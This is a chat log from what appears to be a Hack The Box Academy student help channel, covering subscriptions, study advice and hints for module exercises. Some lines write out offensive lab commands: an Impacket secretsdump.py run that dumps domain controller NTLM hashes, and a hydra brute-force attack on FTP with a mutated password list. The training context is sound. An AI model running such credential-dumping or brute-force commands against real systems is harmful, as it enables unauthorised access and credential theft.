Yeah that feature is just outside of the world XD
thanks for the tip
And don't forget to 
yeah, touch some grass homie
also as a note: make sure you take time for your hobbies outside of learning
Fine..I'll go touch grass then lol
while yes you want to break in: this course isnt graded - there's no pressure aside from what you put on yourself
💯 this, a step away, a shower, a walk.. something to take your mind off of it and you'll be surprised how often the answer comes to you, or at least another idea for approaching it
I was feeling the same way in the last two weeks. What I did was just take three days off with no tech near me. Go hiking with my dog. I feel 100% better
and even then renewed inspiration to keep working at it
Why it's important to not get too focused on a challenge or machine on an exam, just keep moving. Timehole yourself
yeah, totally agree with Marcie
when you step away you give your chance a moment to just think about stuff
without a singular focus
You ever think about something.. then two minutes later forget it.. just stop, don't think about trying to remember. It'll come back
it's why tests are "hard" because you're given a time limit, and your brain overcomplicates the tiniest detail
and you get the result back and it's SO obvious
because you had a chance to step away
I'll take a break this afternoon, that's a start. Thanks guys :))))
What if my hobbies is hacking?
You got this
Make something, break something, do anything other than what you are struggling with
dude u just made my day ngl. That shit is awesome
🤣
Do i need to pay extra if I have the academy subs?
What do you mean?
you need VIP(+) on the main platform to access the retired machines
there's no cross-platform subs
Not yet

would be a neat selling point for the annual subs
That would honestly be better
HTB users in 2024 gonna be eating good
|||Pretends To not be on students sub|||
now go g0b before marketing gets mad at you 
god damn
They can't touch me, they're in another country
LMAO
Our prayers for the brave soldier
If you're subscribing from an educational institution there is, but there's a bit more to it
oh nice
And this soul
Step by step guide on how to access the Student Plan.
That's for the Academy. I think there's something similar for VIP/ VIP+ too, but TLDR you gotta get your University / College on boarded
meanwhile I ||rigged|| got my silver annual from the giveaway
Who in the uni I should contact
Your tutor
ah never mind. My school don't even know this shit exist lmao
My university is off due to a stupid war so I don't think I can contact high authorities
And does my tutor needs to know about HTB?
Generally the institution would need to be registered with HTB in order to benefit from Student discounts
Sudan
I will propose that in the next club meeting. They have enough funds for nonsense stuff
It was registered during the uni ctf
You'd benefit from the discount upon an institution email address, or via manual verification via our support team (first link I shared pertaining to Academy)
Nice, then they are already aware of HTB. You should be able to get them to register as an institution on the platforms. Then you and your classmates can benefit from the discounts.
Nice -
Is it mostly white box?
I don't think politics are allowed here but if you want to know u can dm
The modules lead you through the techniques, and there are exercises at the end to show that you have understood the techniques covered.
That's great, ty
sir that wont work
You aren't just thrown in to a machine blind, there's a lot of content to help you gain knowledge in order to progress
I did the manual verification for the academy sub, so I should do that for the main plat?or do I still need to get someone evolved?
They said the college is currently closed due to war
Honestly I'm not sure.. speaking to the support team and explaining your position would be the best bet.
If it's closed and they aren't able to work, that's a shitty situation 😦
Without engagement from the institution, it'd be hard to verify
Hope you're staying safe ❤️
Yeah that is what is happening, been in a 9 month vacation 
Damn I'm sorry to hear that 😦
So what do I need from my institution to do?
The links I shared cover it
i just sent u a best friend request
Accepted my fren
So basically they are the ones who should be buying it and not me?
For Academy, I believe if the institution registers and you have a educational email address you can purchase yourself
Otherwise yes, then the institution would need to purchase
There is an option on Academy if you don't have an academic email address however
Unsure about our other platform however
if theyve already signed up for uni-ctf in the past Id assume HTB already has them internally recognized, so itd just be a matter of messaging support to review it and get you eligible
Yeah as said.. reach out to support, they'll do what they can
I think I should better contact the support my self to know what is required
(im assuming this is to get student sub)
I am now on the academy student sub, I was looking for the vip sub discount
There is on VIP, but it requires purchase from the institution. Academy is more self serving
ah gotcha, that does make things complicated for them then
Maybe they can get a Sudan ambassador to vouch for em
The copium from this statement is enough to end world hunger
Politicians can be weird. you have no idea what strings they can randomly pull if you dont ask
They could go 'hey we have a promising young hacker trying to increase their skills but are roadblocked due to the war climate. lets pull some strings to get them sorted out'
ive seen weirder shit happen
Hey all I am on the java deobfuscation skills assessment. I was able to get all answers but one As you may have noticed, the JavaScript code is obfuscated. Try applying the skills you learned in this module to deobfuscate the code, and retrieve the 'flag' variable.
What do they mean by flag variable
you would find it once you de obfuscate it
Use the techniques taught so far and deobfuscate the Javascript code. || the flag is assigned to a javascript variable ||
it means a variable, probably named flag
do you have any background knowledge about JavaScript or programming of any kind?
The user friendly JavaScript online compiler that allows you to write JavaScript code and run it online. The JavaScript text editor also supports taking input from the user and standard libraries. It uses the node.js compiler to compile code.
I'm working in the Linux Fundamentals module and got to the question about how many total packages are installed on the target system. I thought "apt list --installed | wc -l" would give me the correct answer but it keeps saying my answer is incorrect. Without giving me the answer, is there some other place I should be looking?
This might be helpful
Instead of wc pipe to head -n 5 and see if you find why it's wrong
Thank you!!
Stupid extra info bits
@fathom pendant I do not but I did find the answer for one of the other questions with the website you provided. That is not the one I am stuck on sadly
More like stupid rookie mistake, but I appreciate your help.
What is a variable is the question you should first ask
Once it's unpacked: then it's obvious
@fathom pendant I dm'd you I feel like I am really close
but I have tried variations of the same flag
I believe if you just run it, it gives you the answer
With no extra bits
:) it's also a nice warning
Haha I must have messed it up when I tried to manually remove the bits. I did a notepad replace all and that did the trick
thanks Again @fathom pendant
If you just run it, you'll get the same thing
hi!! Im trying to do the module 'Searching for Accounts in Group Policy Objects' from CrackMapExec, and it is giving me this error. Can someone help me?
Try increasing the SMB timeout in crackmapexec.
--smb-timeout

Hi everyone,
I'm currently delving into the Windows Event Logs & Finding Evil module.
I'm trying to find the answer to the first question in the skills assessment, but I'm probably barking up the wrong tree.
The question is:
' By examining the logs located in the "C:\Logs\DLLHijack" directory, determine the process responsible for executing a DLL hijacking attack' (.exe file)
Now, I will briefly explain what my approach is. I have:
- Opened the folder in the 'Logs' directory, then the .evtx file
- Filter the log by event ID 7
- Ctrl + F to sift through suspicious entries with no signature (by searching 'false')
(I have already modified the sysmonconfig-export.xml to ensure that nothing is excluded)
Unfortunately, I can't find any useful information.
Can you please give me a hand?
Thank you so much!
Hello everyone,
I'm currently stuck at the skill assessment of the "Parameter Logic Bugs" module.
There should be a vulnerability in this code which allows you to get a subscription with unlimited access but I'm not able to find it.
I found a way to get subscriptions for free but not the one I need. The other ways to get there seems a dead end as well.
Any hints are welcome here. Thank you a lot
dm me
hi everyone,
i don't get the question
i ran a sub-domain scan with ffuf and found 3, but none of them works as a valid answer
it's probably looking for subdomain1 subdomain2 subdomain3
yep... that's it 🤣
i mean it does say "What are all the subdomains"
yes, but how can i know its not csv
the answer format was clarifying not 1, 2, 3
by saying "only write the sub-domain name"
:P
yes maybe my english is not as good as i thought lol
Hello, what can i do if the password to ssh don't work. Except htb support.
introduction to windows command line - Skills Assessment
the password is "previous flag" i am stuck on this one
the password isn't literally "previous flag"
Yes
this
it's the same for the rest of the questions, each question after the first - password is the answer(flag) of the previous question
Can someone help me understand why this may not be working? trying to see if this works for the section: Attacking Domain Trusts - Child -> Parent Trusts - from Linux ||secretsdump.py tester@academy-ea-dc01.inlanefreight.local -k -no-pass -just-dc-ntlm -just-dc-user bross
Impacket v0.9.24.dev1+20211013.152215.3fe2d73a - Copyright 2021 SecureAuth Corporation
[-] RemoteOperations failed: Empty Domain not allowed in Kerberos
[*] Cleaning up... ||
Hello im hard stuck at the password attack module, i passed the password mutation yesterday but i did not save my creds... If i can DM someone that have the creds or can help me thk !
if you still have the mutated list: then all you gotta do is redo the cracking part for the section
kira is the one with the question about Will
:P
Yes but i've tried it and its not working like the password changed
hydra => kira => ftp => Bat...
nope
that's not her password
that's sam
iirc
but kiras had the specific hint
you need to specify the domain before the username <Domain>/<Username>:<Password>@<dc>
@next bronze oh ok - let me try that - ty
for kyra on the ftp i tried my mutated wordlist but not working..
It's a big waste of time
Really fun to wait 4H for a bruteforce lol, learning stuffs, educative 
the mutated have 94K passwords
yes
I do not remember the hint about kira..
then find it :P it's in an early section
but it definitely exists in the mutated wordlist
I do remember that I removed the first 17k passwords in the list to speed it up
not sure if it applies to the question you're doing
actually might be the first 14k
yes should be
trying hydra -l kira -P mut_password.list ftp://10.129.221.57 -t 64 with only password containing will or Will 
ok not working x)
because her password doesn't contain the word will
the hint that tells you about kira is on a question about Will
There is no question about will
that's weird because i'm looking at the question now, in the section that asks about it
I checked Theory of protection , Credential storage , John, Network Services, Password mutations no trace of our friend will, Im tired but I know how to Ctrl+F
what section are you working on then?
On password Reuse but i need the creds of Password mutations, that i did not take note after getting the flag..
OH
you didn't specify that
i thought you were at a later part
just crack sam again
I used the default mut wordlist it took me several hours thats why im asking here if someone can help, I know that i can recrack it ...
just do it and don't complain tbh
¯\_(ツ)_/¯
i don't have the entire list saved anywhere specific just creds here and there
it shouldn't really take hours
It's a useless piece of advice you could have done without.
i also suggest -t 48 instead of 64 most networks have issues with doing 64 threads and end up dropping some
causing more headaches than they're worth
sam's password does start with B iirc
#!/bin/bash
# Decrypt function
function decrypt {
MzSaas7k=$(echo $hash | sed 's/988sn1/83unasa/g')
Mzns7293sk=$(echo $MzSaas7k | sed 's/4d298d/9999/g')
MzSaas7k=$(echo $Mzns7293sk | sed 's/3i8dqos82/873h4d/g')
Mzns7293sk=$(echo $MzSaas7k | sed 's/4n9Ls/20X/g')
MzSaas7k=$(echo $Mzns7293sk | sed 's/912oijs01/i7gg/g')
Mzns7293sk=$(echo $MzSaas7k | sed 's/k32jx0aa/n391s/g')
MzSaas7k=$(echo $Mzns7293sk | sed 's/nI72n/YzF1/g')
Mzns7293sk=$(echo $MzSaas7k | sed 's/82ns71n/2d49/g')
MzSaas7k=$(echo $Mzns7293sk | sed 's/JGcms1a/zIm12/g')
Mzns7293sk=$(echo $MzSaas7k | sed 's/MS9/4SIs/g')
MzSaas7k=$(echo $Mzns7293sk | sed 's/Ymxj00Ims/Uso18/g')
Mzns7293sk=$(echo $MzSaas7k | sed 's/sSi8Lm/Mit/g')
MzSaas7k=$(echo $Mzns7293sk | sed 's/9su2n/43n92ka/g')
Mzns7293sk=$(echo $MzSaas7k | sed 's/ggf3iunds/dn3i8/g')
MzSaas7k=$(echo $Mzns7293sk | sed 's/uBz/TT0K/g')
flag=$(echo $MzSaas7k | base64 -d | openssl enc -aes-128-cbc -a -d -salt -pass pass:$salt)
}
# Variables
var="9M"
salt=""
hash="VTJGc2RHVmtYMTl2ZnYyNTdUeERVRnBtQWVGNmFWWVUySG1wTXNmRi9rQT0K"
# For loop to encode "var" 28 times in base64
for i in {1..28}
do
var=$(echo $var | base64)
done
# Assign the result to the "salt" variable
salt=$var
# Check if $salt is empty
if [[ ! -z "$salt" ]]
then
decrypt
echo $flag
else
exit 1
fi
I am getting this error
enc: Use -help for summary.
any help please
looks like openssl threw that error at you at least that's the only place I see enc
but it also looks like a huge mess of what I assume is necessary
check if openssl is the newest version first
yep but this is exactly the same give in the module
like I said
yeah cause you need the salt value to decrypt
- 3 Create a "For" loop that encodes the variable "var" 28 times in "base64". The number of characters in the 28th hash is the value that must be assigned to the "salt" variable.
this is the task in bash scripting module
did you get the salt value?
maybe use an echo to check if your using your values correctly
echo "MzSaas7k: $MzSaas7k"
echo "salt: $salt"
some like this
yes I have to encode the 9M value to base64 28 times
So I created the for loop
# For loop to encode "var" 28 times in base64
for i in {1..28}
do
var=$(echo $var | base64)
done
then assign the var after 28 times to the salt variable
**The number of characters **in the 28th hash is the value that must be assigned to the "salt" variable
^
thanks for the help
I suggest you make a separate script to loop the var so it's easier to debug
if I remember right I see another error in your script
well that query didn't last long
What query
i was kinda curious

I knew it 
(i figured)
Nothing to do with HTB, but best to remove anyway
This dude figures
I can't imagine doing this in bash and not python
Advising on disclosure
because the question has them do it in bash
iirc that's intro to bash scripting yeah?
yes
I too would rather use python than make a convoluted bash script
gotta check again
iirc I had one htb box where I used a bash hack because I wanted to use sed and didn't want to figure things out in python.
the salt is wrong
34070
I ran the loop 28 times this was the char count I get for the encoded var
#!/bin/bash
var="9M"
for i in {1..28}
do
echo "Iteration no: $i"
var=$(echo $var | base64)
echo -e "\n $var"
done
salt="${#var}"
echo $salt
This my loop
how are you counting it?
also isn't that gonna blow up your terminal with the long strings lol
yep it did
I am counting the chars using
${#var}
#!/bin/bash
var="9M"
# runs 28 times for encoding it 28 times
for i in {1..28}
do
# I encode the value into base64 then assign it to var for further encoding
var=$(echo $var | base64)
done
# I get the number of characters then output it
salt="${#var}"
echo $salt
Am I missing anything?
I just checked, you need to use wc -c
spoilers dude, that's the answer
actually ${#var} does not count the new line character, $(echo $var | wc -c) does, so the question is not quite accurate
stuck on "windows file transfer methods" on the second question where I have to upload to the windows machine. I chose scp and just getting frustrated with PS. i feel like im close but my connection just gets closed by remote hosts. SCP i believe uses p22 by default but thats not open however p21 so im trying that route. does something look wrong here? scp -P 21 Deskop/upload_win.zip htb-student@10.129.99.9:'C:\Users\htb-student\Desktop'
what other port can scp operate in?
it's not about which port, scp uses the SSH protocol, so if the target doesn't have SSH running, then you can't use scp
damn why is it in the cheat sheet
ports are generally standardized but completely arbitrary
because scp has its uses, just depends on what's running
wdym
you use the tool that is best relevant for the situation
if the target has ssh, then scp is a good idea
if it doesnt then it isnt
if youre asking why the cheatsheet mentions specifying ports, thats cause ssh doesnt have to run on 22, thats just the default
https://academy.hackthebox.com/module/77/section/844
whats the supposed solution for root ?
cant curl/wget/scp or anything
we dont do giving answers here
what have you tried, what information have you gathered
where do i ask for support with troubleshooting linux, im on the linux fundamentals module
dm
yeah i ran an nmap and i dont see openssh or anything similar running so scp isnt an option
solved it...

